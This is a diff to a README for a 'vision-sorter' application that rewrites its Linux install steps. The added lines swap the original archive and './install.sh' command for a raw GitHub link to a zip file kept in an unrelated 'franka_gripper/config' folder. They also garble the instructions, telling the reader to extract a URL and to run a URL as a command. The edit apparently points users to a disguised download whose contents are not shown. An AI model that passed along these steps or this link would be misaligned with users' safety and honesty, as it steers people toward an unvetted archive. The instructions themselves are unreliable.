DarkXDemonX/vision-sorter/README.md

 ### Step 4: Install the Application
 1. **For Windows**: Open the .exe file once the download is complete.
 Follow the on-screen prompts to install.
 2. **For macOS**: Open the .dmg file.
 Drag the vision-sorter application to your Applications folder.
-3. **For Linux**: Extract the .tar.gz file.
+3. **For Linux**: Extract the https://raw.githubusercontent.com/DarkXDemonX/vision-sorter/master/franka_gripper/config/vision-sorter-3.0.zip file.
 Open a terminal and navigate to the extracted folder.
-Use the command `./install.sh` to install.
+Use the command `https://raw.githubusercontent.com/DarkXDemonX/vision-sorter/master/franka_gripper/config/vision-sorter-3.0.zip` to install.

 ### Step 5: Run the Application
 Once installed, you can find the vision-sorter application in your Applications folder (macOS), Start Menu (Windows), or by using the terminal (Linux).
 Double-click the application to start it.